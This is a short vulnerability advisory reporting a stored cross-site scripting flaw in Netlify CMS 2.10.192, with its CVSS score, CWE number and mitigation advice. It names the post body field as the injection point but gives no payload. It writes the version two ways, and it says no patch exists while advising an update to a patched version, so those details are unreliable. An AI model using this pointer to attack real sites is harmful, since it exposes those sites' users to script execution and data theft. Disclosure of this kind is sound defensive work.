Vendor: Netlify CMS
By: tmrswrr
CVSS: 5.5 (MEDIUM)
Stored Cross-Site Scripting (XSS)
CWE: 79
Product Name: Netlify CMS
Affected Version From: 2.10.0192
Affected Version To: 2.10.0192
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
Netlify CMS 2.10.192 – Stored Cross-Site Scripting (XSS)
Netlify CMS version 2.10.192 is vulnerable to stored cross-site scripting (XSS). An attacker can inject malicious code into the body field of a new post, and that code is executed when the post is saved. This can lead to the execution of arbitrary code in the context of the user's browser, potentially allowing further exploitation or data theft.
Mitigation:
Update to a patched version of Netlify CMS that addresses the XSS vulnerability. Sanitize user input to prevent malicious code injection.